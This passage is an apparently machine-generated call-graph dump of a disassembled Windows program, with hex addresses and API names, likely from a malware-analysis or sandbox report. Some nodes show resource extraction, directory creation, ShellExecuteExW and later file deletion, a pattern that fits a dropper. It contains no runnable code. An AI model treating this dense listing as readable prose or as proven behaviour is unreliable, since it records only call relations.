32223->32143 32224->32136 32225->32126 32226->32133 32227->32136 32229 d51be4 32228->32229 32230 d51bd7 32228->32230 32233 d51bf0 32229->32233 32266 d41857 14 API calls _free 32229->32266 32265 d41857 14 API calls _free 32230->32265 32232 d51bdc 32232->32184 32233->32184 32235 d51c11 32267 d41341 25 API calls __strnicoll 32235->32267 32237->32159 32238->32167 32239->32168 32240->32165 32241->32176 32242->32183 32243->32216 32245 d4694b 32244->32245 32249 d4691b _free 32244->32249 32269 d41857 14 API calls _free 32245->32269 32246 d46936 RtlAllocateHeap 32248 d46949 32246->32248 32246->32249 32251 d468d3 14 API calls _free 32248->32251 32249->32245 32249->32246 32268 d427bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 32249->32268 32251->32185 32252->32191 32253->32206 32254->32216 32255->32180 32256->32216 32257->32167 32258->32216 32259->32217 32260->32207 32261->32216 32262->32161 32263->32165 32264->32167 32265->32232 32266->32235 32267->32232 32268->32249 32269->32248 32270 d1eef0 32386 d1a230 71 API calls 6 library calls 32270->32386 32272 d1ef37 32387 d140f0 32272->32387 32275 d1f725 32515 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32275->32515 32276 d1ef54 32402 d27040 32276->32402 32278 d1f72f 32516 d41351 25 API calls 2 library calls 32278->32516 32281 d1f734 32517 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32281->32517 32282 d1ef6c 32284 d1ef79 32282->32284 32491 d25750 32282->32491 32284->32278 32287 d1efa7 error_info_injector 32284->32287 32285 d1f73e 32518 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32285->32518 32288 d140f0 40 API calls 32287->32288 32290 d1efc8 32288->32290 32290->32281 32293 d1efd2 32290->32293 32291 d1f748 32519 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32291->32519 32297 d27040 37 API calls 32293->32297 32294 d1f752 32520 d272b0 GetLastError RaiseException 32294->32520 32296 d1f757 32521 d272b0 GetLastError RaiseException 32296->32521 32299 d1efee 32297->32299 32301 d1efff 32299->32301 32304 d25750 29 API calls 32299->32304 32300 d1f75c 32302 d1f761 32300->32302 32522 d41351 25 API calls 2 library calls 32300->32522 32424 d24f70 42 API calls 32301->32424 32523 d41351 25 API calls 2 library calls 32302->32523 32304->32301 32306 d1f012 32309 d140f0 40 API calls 32306->32309 32310 d1f03b 32309->32310 32310->32285 32311 d1f045 32310->32311 32312 d27040 37 API calls 32311->32312 32313 d1f061 32312->32313 32314 d1f072 32313->32314 32315 d25750 29 API calls 32313->32315 32425 d24f70 42 API calls 32314->32425 32315->32314 32317 d1f088 32426 d24f70 42 API calls 32317->32426 32319 d1f09d 32320 d140f0 40 API calls 32319->32320 32321 d1f0e4 32320->32321 32321->32291 32322 d1f0ee 32321->32322 32323 d27040 37 API calls 32322->32323 32324 d1f10a 32323->32324 32325 d1f11b 32324->32325 32326 d25750 29 API calls 32324->32326 32427 d24f70 42 API calls 32325->32427 32326->32325 32328 d1f131 32428 d24f70 42 API calls 32328->32428 32330 d1f146 CreateDirectoryW 32332 d1f1a0 32330->32332 32338 d1f45f 32332->32338 32429 d25870 54 API calls 32332->32429 32334 d1f1e7 32430 d28500 32334->32430 32336 d1f1ff 32337 d28500 27 API calls 32336->32337 32339 d1f219 32337->32339 32338->32300 32341 d1f54c error_info_injector 32338->32341 32441 d176a0 32339->32441 32508 d344d0 32341->32508 32344 d1f232 SysAllocStringLen 32344->32294 32346 d1f24b SysAllocStringLen 32344->32346 32345 d1f721 32346->32296 32347 d1f25c 32346->32347 32348 d1f269 32347->32348 32349 d1f28e 32347->32349 32504 d3c92f 32348->32504 32353 d28500 27 API calls 32349->32353 32350 d1f551 32507 d25f90 25 API calls error_info_injector 32350->32507 32355 d1f29f 32353->32355 32477 d1eb40 127 API calls 32355->32477 32357 d1f2a9 32357->32350 32358 d1f2b4 __InternalCxxFrameHandler 32357->32358 32358->32338 32478 d173a0 28 API calls 3 library calls 32358->32478 32360 d1f300 32479 d25870 54 API calls 32360->32479 32362 d1f318 32480 d25f90 25 API calls error_info_injector 32362->32480 32364 d1f324 __InternalCxxFrameHandler 32481 d173a0 28 API calls 3 library calls 32364->32481 32366 d1f356 32482 d25870 54 API calls 32366->32482 32368 d1f371 32483 d25f90 25 API calls error_info_injector 32368->32483 32370 d1f37d 32484 d25870 54 API calls 32370->32484 32372 d1f38d 32485 d25870 54 API calls 32372->32485 32374 d1f39e 32486 d24f70 42 API calls 32374->32486 32376 d1f3b4 32487 d24f70 42 API calls 32376->32487 32378 d1f3cc 32488 d24f70 42 API calls 32378->32488 32380 d1f3e7 32381 d28500 27 API calls 32380->32381 32382 d1f431 32381->32382 32383 d28500 27 API calls 32382->32383 32384 d1f451 32383->32384 32489 d19ce0 ShellExecuteExW WaitForSingleObject 32384->32489 32386->32272 32388 d1411a 32387->32388 32399 d14106 32387->32399 32524 d345f5 6 API calls 32388->32524 32390 d14124 32392 d14130 GetProcessHeap 32390->32392 32390->32399 32525 d34b32 28 API calls 32392->32525 32394 d1416f 32401 d14114 32394->32401 32528 d34b32 28 API calls 32394->32528 32395 d14156 32526 d345ab EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32395->32526 32398 d141c8 32529 d345ab EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 32398->32529 32399->32401 32527 d345f5 6 API calls 32399->32527 32401->32275 32401->32276 32403 d27050 32402->32403 32404 d270b5 32402->32404 32403->32404 32530 d365a2 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 32403->32530 32404->32282 32406 d27080 FindResourceExW 32407 d2706c 32406->32407 32407->32404 32407->32406 32410 d270c2 32407->32410 32531 d13fb0 LoadResource LockResource SizeofResource 32407->32531 32532 d365a2 RaiseException EnterCriticalSection LeaveCriticalSection EnterCriticalSection LeaveCriticalSection 32407->32532 32410->32404 32411 d270c6 FindResourceW 32410->32411 32411->32404 32412 d270d4 32411->32412 32533 d13fb0 LoadResource LockResource SizeofResource 32412->32533 32414 d270e0 32414->32404 32416 d2710f 32414->32416 32534 d28590 27 API calls 32414->32534 32535 d3a32e 25 API calls 4 library calls 32416->32535 32418 d27128 32536 d13ee0 GetLastError RaiseException 32418->32536 32420 d2712e 32421 d27138 32420->32421 32537 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32420->32537 32421->32282 32423 d2715a 32424->32306 32425->32317 32426->32319 32427->32328 32428->32330 32429->32334 32431 d2850b 32430->32431 32432 d2851a 32431->32432 32433 d28585 32431->32433 32437 d28533 ___scrt_fastfail 32431->32437 32432->32336 32540 d272b0 GetLastError RaiseException 32433->32540 32439 d28556 _Yarn 32437->32439 32538 d41857 14 API calls _free 32437->32538 32438 d28575 32539 d41341 25 API calls __strnicoll 32438->32539 32439->32336 32442 d17700 32441->32442 32442->32442 32541 d27b00 27 API calls 3 library calls 32442->32541 32444 d17719 32542 d14a70 27 API calls 32444->32542 32447 d17a12 32573 d41351 25 API calls 2 library calls 32447->32573 32448 d1772d error_info_injector 32448->32447 32543 d27b00 27 API calls 3 library calls 32448->32543 32449 d1778e 32544 d27b00 27 API calls 3 library calls 32449->32544 32452 d17a17 32574 d41351 25 API calls 2 library calls 32452->32574 32453 d177ac 32453->32447 32459 d177e0 error_info_injector 32453->32459 32456 d17a1c 32575 d41351 25 API calls 2 library calls 32456->32575 32457 d17810 32546 d15230 120 API calls 7 library calls 32457->32546 32545 d27b00 27 API calls 3 library calls 32459->32545 32462 d17825 32462->32452 32463 d17859 error_info_injector 32462->32463 32547 d27b00 27 API calls 3 library calls 32463->32547 32465 d17899 32470 d17902 32465->32470 32548 d40e1d 32465->32548 32467 d1793b error_info_injector 32572 d14d20 26 API calls error_info_injector 32467->32572 32470->32456 32470->32467 32472 d17950 32475 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32472->32475 32473 d178f7 32559 d40ee6 32473->32559 32476 d17a0e 32475->32476 32476->32344 32476->32350 32477->32357 32478->32360 32479->32362 32480->32364 32481->32366 32482->32368 32483->32370 32484->32372 32485->32374 32486->32376 32487->32378 32488->32380 32490 d19d60 32489->32490 32490->32338 32492 d257be 32491->32492 32493 d2575f MultiByteToWideChar 32491->32493 32746 d273e0 GetLastError RaiseException 32492->32746 32493->32492 32496 d25777 32493->32496 32495 d25794 MultiByteToWideChar 32499 d257aa 32495->32499 32500 d257ce 32495->32500 32496->32495 32745 d28590 27 API calls 32496->32745 32497 d257c5 32497->32284 32499->32284 32747 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32500->32747 32501 d25792 32501->32495 32503 d257d8 32748 d46f6d GetLastError 32504->32748 32507->32341 32509 d344db IsProcessorFeaturePresent 32508->32509 32510 d344d9 32508->32510 32512 d34707 32509->32512 32510->32345 32784 d346cb SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 32512->32784 32514 d347ea 32514->32345 32515->32278 32517->32285 32518->32291 32519->32294 32524->32390 32525->32395 32526->32399 32527->32394 32528->32398 32529->32401 32530->32407 32531->32407 32532->32407 32533->32414 32534->32416 32535->32418 32536->32420 32537->32423 32538->32438 32539->32439 32541->32444 32542->32448 32543->32449 32544->32453 32545->32457 32546->32462 32547->32465 32549 d40e2a 32548->32549 32550 d40e3b 32548->32550 32593 d41857 14 API calls _free 32549->32593 32576 d40d67 32550->32576 32554 d40e2f 32594 d41341 25 API calls __strnicoll 32554->32594 32555 d178d2 32555->32470 32558 d4177b 97 API calls 2 library calls 32555->32558 32558->32473 32560 d40ef2 __FrameHandler3::FrameUnwindToState 32559->32560 32561 d40f11 32560->32561 32562 d40efc 32560->32562 32568 d40f0c 32561->32568 32641 d4150c EnterCriticalSection 32561->32641 32658 d41857 14 API calls _free 32562->32658 32564 d40f01 32659 d41341 25 API calls __strnicoll 32564->32659 32567 d40f2e 32642 d40e6f 32567->32642 32568->32470 32570 d40f39 32660 d40f60 LeaveCriticalSection __fread_nolock 32570->32660 32572->32472 32579 d40d73 __FrameHandler3::FrameUnwindToState 32576->32579 32577 d40d7a 32604 d41857 14 API calls _free 32577->32604 32579->32577 32581 d40d9c 32579->32581 32580 d40d7f 32605 d41341 25 API calls __strnicoll 32580->32605 32583 d40da1 32581->32583 32584 d40dae 32581->32584 32606 d41857 14 API calls _free 32583->32606 32596 d48a8c 32584->32596 32585 d40d8a 32585->32555 32595 d41857 14 API calls _free 32585->32595 32589 d40dbd 32607 d41857 14 API calls _free 32589->32607 32590 d40dca 32608 d40e06 LeaveCriticalSection __fread_nolock 32590->32608 32593->32554 32594->32555 32595->32555 32597 d48a98 __FrameHandler3::FrameUnwindToState 32596->32597 32609 d452fb EnterCriticalSection 32597->32609 32599 d48aa6 32610 d48b30 32599->32610 32604->32580 32605->32585 32606->32585 32607->32585 32608->32585 32609->32599 32617 d48b53 32610->32617 32611 d48bab 32628 d46876 32611->32628 32616 d48bbd 32622 d48ab3 32616->32622 32636 d49972 6 API calls _free 32616->32636 32617->32611 32617->32617 32617->32622 32626 d4150c EnterCriticalSection 32617->32626 32627 d41520 LeaveCriticalSection 32617->32627 32619 d48bdc 32637 d4150c EnterCriticalSection 32619->32637 32623 d48aec 32622->32623 32640 d45343 LeaveCriticalSection 32623->32640 32625 d40db7 32625->32589 32625->32590 32626->32617 32627->32617 32633 d46883 _free 32628->32633 32629 d468c3 32639 d41857 14 API calls _free 32629->32639 32630 d468ae RtlAllocateHeap 32631 d468c1 32630->32631 32630->32633 32635 d468d3 14 API calls _free 32631->32635 32633->32629 32633->32630 32638 d427bf EnterCriticalSection LeaveCriticalSection std::_Facet_Register 32633->32638 32635->32616 32636->32619 32637->32622 32638->32633 32639->32631 32640->32625 32641->32567 32643 d40e91 32642->32643 32644 d40e7c 32642->32644 32651 d40e8c 32643->32651 32661 d3da47 32643->32661 32686 d41857 14 API calls _free 32644->32686 32646 d40e81 32687 d41341 25 API calls __strnicoll 32646->32687 32651->32570 32653 d463e8 __fread_nolock 25 API calls 32654 d40eb4 32653->32654 32671 d4908b 32654->32671 32658->32564 32659->32568 32660->32568 32662 d3da84 32661->32662 32663 d3da5f 32661->32663 32667 d491b4 32662->32667 32663->32662 32664 d463e8 __fread_nolock 25 API calls 32663->32664 32665 d3da7d 32664->32665 32689 d487ab 95 API calls 5 library calls 32665->32689 32668 d40eae 32667->32668 32669 d491cb 32667->32669 32668->32653 32669->32668 32690 d468d3 14 API calls _free 32669->32690 32672 d490b1 32671->32672 32673 d4909c 32671->32673 32674 d490fa 32672->32674 32679 d490d8 32672->32679 32702 d41844 14 API calls _free 32673->32702 32704 d41844 14 API calls _free 32674->32704 32676 d490a1 32703 d41857 14 API calls _free 32676->32703 32691 d48fff 32679->32691 32680 d490ff 32705 d41857 14 API calls _free 32680->32705 32683 d40eba 32683->32651 32688 d468d3 14 API calls _free 32683->32688 32684 d49107 32706 d41341 25 API calls __strnicoll 32684->32706 32686->32646 32687->32651 32688->32651 32689->32662 32690->32668 32692 d4900b __FrameHandler3::FrameUnwindToState 32691->32692 32707 d4c81f EnterCriticalSection 32692->32707 32694 d49019 32695 d49040 32694->32695 32696 d4904b 32694->32696 32708 d49118 32695->32708 32723 d41857 14 API calls _free 32696->32723 32699 d49046 32724 d4907f LeaveCriticalSection __wsopen_s 32699->32724 32701 d49068 32701->32683 32702->32676 32703->32683 32704->32680 32705->32684 32706->32683 32707->32694 32725 d4ca9b 32708->32725 32710 d4912e 32738 d4ca0a 15 API calls 3 library calls 32710->32738 32712 d49128 32712->32710 32715 d4ca9b __wsopen_s 25 API calls 32712->32715 32722 d49160 32712->32722 32713 d4ca9b __wsopen_s 25 API calls 32716 d4916c FindCloseChangeNotification 32713->32716 32714 d49186 32720 d491a8 32714->32720 32739 d41821 14 API calls 2 library calls 32714->32739 32717 d49157 32715->32717 32716->32710 32718 d49178 GetLastError 32716->32718 32721 d4ca9b __wsopen_s 25 API calls 32717->32721 32718->32710 32720->32699 32721->32722 32722->32710 32722->32713 32723->32699 32724->32701 32726 d4cabd 32725->32726 32727 d4caa8 32725->32727 32732 d4cae2 32726->32732 32742 d41844 14 API calls _free 32726->32742 32740 d41844 14 API calls _free 32727->32740 32729 d4caad 32741 d41857 14 API calls _free 32729->32741 32732->32712 32733 d4caed 32743 d41857 14 API calls _free 32733->32743 32735 d4cab5 32735->32712 32736 d4caf5 32744 d41341 25 API calls __strnicoll 32736->32744 32738->32714 32739->32720 32740->32729 32741->32735 32742->32733 32743->32736 32744->32735 32745->32501 32746->32497 32747->32503 32749 d46f84 32748->32749 32750 d46f8a 32748->32750 32775 d49837 6 API calls _free 32749->32775 32754 d46f90 SetLastError 32750->32754 32776 d49876 6 API calls _free 32750->32776 32753 d46fa8 32753->32754 32755 d46876 _free 14 API calls 32753->32755 32758 d47024 32754->32758 32759 d1f26e SleepEx DeleteFileW 32754->32759 32757 d46fb8 32755->32757 32760 d46fd7 32757->32760 32761 d46fc0 32757->32761 32783 d45e99 71 API calls __purecall 32758->32783 32759->32349 32779 d49876 6 API calls _free 32760->32779 32777 d49876 6 API calls _free 32761->32777 32765 d46fce 32778 d468d3 14 API calls _free 32765->32778 32767 d46fe3 32768 d46fe7 32767->32768 32769 d46ff8 32767->32769 32780 d49876 6 API calls _free 32768->32780 32781 d46d9b 14 API calls _free 32769->32781 32773 d47003 32782 d468d3 14 API calls _free 32773->32782 32775->32750 32776->32753 32777->32765 32778->32754 32779->32767 32780->32765 32781->32773 32782->32754 32784->32514 32785 d1da40 32786 d28500 27 API calls 32785->32786 32787 d1da9e 32786->32787 32962 d1a890 32787->32962 32790 d28500 27 API calls 32791 d1dacc 32790->32791 33009 d170d0 32791->33009 32795 d1daf8 32796 d254b0 27 API calls 32795->32796 32797 d1db0d 32796->32797 33052 d25170 32797->33052 32800 d1db24 33078 d257e0 32800->33078 32801 d1e5eb 32802 d28500 27 API calls 32801->32802 32803 d1e61c 32802->32803 32804 d16c60 35 API calls 32803->32804 32806 d1e62c 32804->32806 33111 d29fd0 76 API calls __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 32806->33111 32808 d1e641 32809 d1e678 error_info_injector 32808->32809 32814 d1eb21 32808->32814 33112 d2a200 27 API calls 3 library calls 32809->33112 32810 d1db3f 32811 d257e0 27 API calls 32810->32811 32820 d1db7e 32811->32820 32813 d1e6aa 33113 d2a340 27 API calls 2 library calls 32813->33113 33128 d41351 25 API calls 2 library calls 32814->33128 32817 d1e6b8 33114 d2a200 27 API calls 3 library calls 32817->33114 32818 d1eb26 33129 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32818->33129 32824 d257e0 27 API calls 32820->32824 32822 d1eb30 33130 d41351 25 API calls 2 library calls 32822->33130 32823 d1e6c9 33115 d2a340 27 API calls 2 library calls 32823->33115 32831 d1dbba 32824->32831 32828 d1e6d7 33116 d2a200 27 API calls 3 library calls 32828->33116 32830 d1e6e8 33117 d2a340 27 API calls 2 library calls 32830->33117 32833 d257e0 27 API calls 32831->32833 32835 d1dbf6 32833->32835 32834 d1e6f3 33118 d2a200 27 API calls 3 library calls 32834->33118 32837 d25750 29 API calls 32835->32837 32839 d1dc26 32837->32839 32838 d1e704 33119 d2a340 27 API calls 2 library calls 32838->33119 32841 d25170 28 API calls 32839->32841 32843 d1dc30 32841->32843 32842 d1e70f 33120 d2a200 27 API calls 3 library calls 32842->33120 32846 d1dc57 32843->32846 33086 d41d18 26 API calls 32843->33086 32845 d1e720 33121 d2a340 27 API calls 2 library calls 32845->33121 32849 d25170 28 API calls 32846->32849 32852 d1dc61 32849->32852 32850 d1e72b 32856 d25750 29 API calls 32850->32856 32858 d1e757 32850->32858 32851 d1dc3f 32853 d3c92f 71 API calls 32851->32853 32854 d1dc7e 32852->32854 32860 d3c92f 71 API calls 32852->32860 32859 d1dc47 32853->32859 32855 d140f0 40 API calls 32854->32855 32861 d1dc83 32855->32861 32856->32858 32857 d1e779 32863 d1e795 32857->32863 32869 d25750 29 API calls 32857->32869 32858->32857 32862 d25750 29 API calls 32858->32862 32864 d25750 29 API calls 32859->32864 32865 d1dc6e 32860->32865 32867 d1eb0d 32861->32867 32868 d1dc8d 32861->32868 32862->32857 32870 d1e7b1 32863->32870 32872 d25750 29 API calls 32863->32872 32864->32846 32866 d25750 29 API calls 32865->32866 32866->32854 33125 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32867->33125 32878 d27040 37 API calls 32868->32878 32869->32863 32873 d1e7cd 32870->32873 32874 d25750 29 API calls 32870->32874 32872->32870 32875 d140f0 40 API calls 32873->32875 32874->32873 32877 d1e7d2 32875->32877 32876 d1eb17 33126 d41351 25 API calls 2 library calls 32876->33126 32877->32818 32880 d1e7dc 32877->32880 32881 d1dcb1 32878->32881 32887 d27040 37 API calls 32880->32887 32883 d1dcc5 32881->32883 32885 d25750 29 API calls 32881->32885 32882 d1eb1c 33127 d41351 25 API calls 2 library calls 32882->33127 33087 d24f70 42 API calls 32883->33087 32885->32883 32889 d1e800 32887->32889 32888 d1dce0 33088 d24f70 42 API calls 32888->33088 32891 d1e814 32889->32891 32894 d25750 29 API calls 32889->32894 33122 d24f70 42 API calls 32891->33122 32892 d1dcf9 32893 d257e0 27 API calls 32892->32893 32900 d1dd0b 32893->32900 32894->32891 32896 d1e82f 33123 d24f70 42 API calls 32896->33123 32898 d1e848 32899 d257e0 27 API calls 32898->32899 32904 d1e85a 32899->32904 32901 d28500 27 API calls 32900->32901 32902 d1dd85 32901->32902 33089 d16c60 32902->33089 32906 d28500 27 API calls 32904->32906 32913 d1e8ce error_info_injector 32906->32913 32907 d28500 27 API calls 32908 d1ddb9 32907->32908 32909 d16c60 35 API calls 32908->32909 32910 d1ddc9 32909->32910 32911 d28500 27 API calls 32910->32911 32912 d1dded 32911->32912 32914 d16c60 35 API calls 32912->32914 32913->32822 32915 d1ea3b error_info_injector 32913->32915 32916 d1ddfd 32914->32916 33124 d258f0 27 API calls 32915->33124 32918 d28500 27 API calls 32916->32918 32919 d1de21 32918->32919 32920 d16c60 35 API calls 32919->32920 32921 d1de31 32920->32921 32923 d28500 27 API calls 32921->32923 32922 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32924 d1eb07 32922->32924 32925 d1de55 32923->32925 32926 d16c60 35 API calls 32925->32926 32927 d1de65 32926->32927 33098 d2d000 27 API calls 3 library calls 32927->33098 32929 d1de7b 33099 d27e10 27 API calls 3 library calls 32929->33099 32931 d1debe 33100 d2c210 27 API calls 2 library calls 32931->33100 32933 d1df05 33101 d27e10 27 API calls 3 library calls 32933->33101 32935 d1df18 33102 d2c210 27 API calls 2 library calls 32935->33102 32937 d1df5f 33103 d27e10 27 API calls 3 library calls 32937->33103 32939 d1df72 33104 d2c210 27 API calls 2 library calls 32939->33104 32941 d1dfbc 33105 d27e10 27 API calls 3 library calls 32941->33105 32943 d1dfd2 33106 d2c210 27 API calls 2 library calls 32943->33106 32945 d1e01c 33107 d27e10 27 API calls 3 library calls 32945->33107 32947 d1e032 error_info_injector 32947->32876 32948 d1e479 error_info_injector 32947->32948 33108 d25870 54 API calls 32948->33108 32950 d1e4b5 32951 d28500 27 API calls 32950->32951 32952 d1e4dd 32951->32952 33109 d16d70 75 API calls 2 library calls 32952->33109 32954 d1e4ed 32955 d28500 27 API calls 32954->32955 32956 d1e50b 32955->32956 33110 d1a4a0 131 API calls 3 library calls 32956->33110 32958 d1e519 32959 d28500 27 API calls 32958->32959 32961 d1e52a 32959->32961 32960 d1e584 error_info_injector 32960->32922 32961->32882 32961->32960 32963 d140f0 40 API calls 32962->32963 32964 d1a8ea 32963->32964 32965 d1a8f4 32964->32965 32966 d1ad4a 32964->32966 32969 d27040 37 API calls 32965->32969 33190 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32966->33190 32968 d1ad54 33191 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32968->33191 32971 d1a910 32969->32971 32973 d1a921 32971->32973 32975 d25750 29 API calls 32971->32975 32972 d1ad5e 33192 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32972->33192 33131 d230a0 32973->33131 32975->32973 32976 d1ad68 33193 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32976->33193 32979 d1ad72 33194 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 32979->33194 32980 d1abf4 33152 d25020 32980->33152 32983 d1ad7c 33195 d41351 25 API calls 2 library calls 32983->33195 32987 d28500 27 API calls 32989 d1ac0a 32987->32989 33172 d23d50 32989->33172 32990 d1abba 33146 d26890 32990->33146 32995 d1ac41 std::ios_base::_Ios_base_dtor 32995->32983 32996 d1acd1 error_info_injector 32995->32996 32999 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 32996->32999 32997 d27040 37 API calls 33005 d1a936 _Yarn 32997->33005 32998 d25750 29 API calls 32998->33005 33001 d1ad46 32999->33001 33000 d140f0 40 API calls 33000->33005 33001->32790 33004 d41857 14 API calls _free 33004->33005 33005->32968 33005->32972 33005->32976 33005->32979 33005->32980 33005->32990 33005->32997 33005->32998 33005->33000 33005->33004 33006 d41341 25 API calls __strnicoll 33005->33006 33008 d28500 27 API calls 33005->33008 33140 d2a510 33005->33140 33176 d272c0 27 API calls 4 library calls 33005->33176 33177 d28590 27 API calls 33005->33177 33178 d285f0 27 API calls 5 library calls 33005->33178 33006->33005 33008->33005 33010 d28500 27 API calls 33009->33010 33011 d1713a 33010->33011 33012 d16c60 35 API calls 33011->33012 33013 d17147 33012->33013 33379 d16a20 33013->33379 33016 d17185 error_info_injector 33021 d171c2 _Yarn 33016->33021 33396 d28b10 27 API calls 2 library calls 33016->33396 33017 d17382 33397 d41351 25 API calls 2 library calls 33017->33397 33386 d16630 33021->33386 33023 d17387 33398 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33023->33398 33024 d140f0 40 API calls 33026 d17228 33024->33026 33026->33023 33028 d17232 33026->33028 33027 d17391 33399 d41351 25 API calls 2 library calls 33027->33399 33031 d27040 37 API calls 33028->33031 33032 d1724c 33031->33032 33033 d17259 33032->33033 33034 d25750 29 API calls 33032->33034 33035 d28500 27 API calls 33033->33035 33034->33033 33036 d1726a error_info_injector 33035->33036 33036->33027 33037 d17300 error_info_injector 33036->33037 33038 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33037->33038 33039 d1737e 33038->33039 33040 d254b0 33039->33040 33041 d25527 33040->33041 33042 d254c8 33040->33042 33041->32795 33042->33041 33043 d25704 33042->33043 33048 d255da __InternalCxxFrameHandler _Yarn ___scrt_fastfail 33042->33048 33417 d28590 27 API calls 33042->33417 33047 d25715 33043->33047 33418 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33043->33418 33046 d25740 33047->32795 33048->33043 33049 d41341 25 API calls __strnicoll 33048->33049 33050 d41857 14 API calls _free 33048->33050 33051 d13ee0 GetLastError RaiseException 33048->33051 33049->33048 33050->33048 33051->33048 33053 d25181 33052->33053 33065 d251d6 33052->33065 33055 d40fb7 GetStringTypeW 33053->33055 33066 d251ab 33053->33066 33055->33053 33056 d251fe 33057 d40fb7 GetStringTypeW 33056->33057 33062 d25219 33056->33062 33057->33056 33058 d1db18 33058->32800 33058->32801 33059 d252b1 33059->33058 33429 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33059->33429 33061 d25246 33067 d25276 33061->33067 33068 d2525f 33061->33068 33070 d2526f __InternalCxxFrameHandler 33061->33070 33062->33058 33062->33059 33062->33061 33423 d28590 27 API calls 33062->33423 33063 d252da 33065->33059 33419 d40fb7 33065->33419 33066->33059 33066->33065 33422 d28590 27 API calls 33066->33422 33067->33070 33426 d41857 14 API calls _free 33067->33426 33424 d41857 14 API calls _free 33068->33424 33428 d13ee0 GetLastError RaiseException 33070->33428 33073 d25264 33425 d41341 25 API calls __strnicoll 33073->33425 33076 d25289 33427 d41341 25 API calls __strnicoll 33076->33427 33079 d257f8 33078->33079 33084 d25840 33078->33084 33080 d25835 33079->33080 33081 d25808 33079->33081 33435 d285f0 27 API calls 5 library calls 33080->33435 33083 d28500 27 API calls 33081->33083 33085 d2580d 33083->33085 33084->32810 33085->32810 33086->32851 33087->32888 33088->32892 33436 d26d40 33089->33436 33091 d16cbe 33461 d27d20 33091->33461 33093 d16cf2 33094 d16d08 33093->33094 33471 d41d58 14 API calls _free 33093->33471 33096 d344d0 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z 5 API calls 33094->33096 33097 d16d46 33096->33097 33097->32907 33098->32929 33099->32931 33100->32933 33101->32935 33102->32937 33103->32939 33104->32941 33105->32943 33106->32945 33107->32947 33108->32950 33109->32954 33110->32958 33111->32808 33112->32813 33113->32817 33114->32823 33115->32828 33116->32830 33117->32834 33118->32838 33119->32842 33120->32845 33121->32850 33122->32896 33123->32898 33124->32960 33125->32876 33129->32822 33196 d28810 33131->33196 33137 d2315c 33138 d23181 33137->33138 33139 d12bd0 27 API calls 33137->33139 33138->33005 33139->33138 33141 d2a552 33140->33141 33142 d29cb0 97 API calls 33141->33142 33144 d2a562 33142->33144 33330 d2f1d0 33144->33330 33147 d268a4 33146->33147 33148 d1abc5 33146->33148 33347 d266d0 33147->33347 33148->32980 33179 d12bd0 33148->33179 33150 d268a9 33151 d40ee6 100 API calls 33150->33151 33151->33148 33155 d2507d std::_Locinfo::_Locinfo_dtor 33152->33155 33160 d25035 std::_Locinfo::_Locinfo_dtor 33152->33160 33153 d1ac00 33153->32987 33155->33153 33368 d273a0 27 API calls 33155->33368 33156 d250c8 33157 d250e8 33156->33157 33161 d25103 33156->33161 33165 d250f8 __InternalCxxFrameHandler 33156->33165 33369 d41857 14 API calls _free 33157->33369 33160->33155 33367 d286f0 27 API calls 33160->33367 33161->33165 33371 d41857 14 API calls _free 33161->33371 33162 d2513e 33162->33153 33374 d13ea0 GetLastError RaiseException Concurrency::cancel_current_task 33162->33374 33163 d250ed 33370 d41341 25 API calls __strnicoll 33163->33370 33373 d13ee0 GetLastError RaiseException 33165->33373 33168 d25116 33372 d41341 25 API calls __strnicoll 33168->33372 33171 d2516c 33173 d23d82 33172->33173 33174 d26890 100 API calls 33173->33174 33175 d23dad error_info_injector 33173->33175 33174->33175 33175->32995 33176->33005 33177->33005 33178->33005 33180 d12bf1 33179->33180 33181 d12be9 33179->33181 33180->32980 33183 d12c00 33181->33183 33375 d3731a RaiseException 33181->33375 33376 d12ba0 27 API calls 33183->33376 33185 d12c30 33377 d3731a RaiseException 33185->33377 33187 d12c3f 33378 d36b4e 26 API calls ___std_exception_copy 33187->33378 33189 d12c64 33189->32980 33190->32968 33191->32972 33192->32976 33193->32979 33194->32983 33197 d12bd0 27 API calls 33196->33197 33198 d28889 33197->33198 33221 d348c6 33198->33221 33200 d28890 33235 d35776 33200->33235 33202 d288a0 33247 d29cb0 33202->33247 33205 d23125 33207 d26a20 33205->33207 33206 d12bd0 27 API calls 33206->33205 33208 d348c6 std::_Facet_Register 27 API calls 33207->33208 33209 d26a5a 33208->33209 33210 d35776 std::locale::_Init 75 API calls 33209->33210 33211 d2314b 33210->33211 33212 d26960 33211->33212 33213 d26a04 33212->33213 33214 d2698f 33212->33214 33213->33137 33321 d35b24 33214->33321 33218 d269ad 33328 d2a760 97 API calls 3 library calls 33218->33328 33220 d269cd 33220->33137 33224 d348cb 33221->33224 33223 d348e5 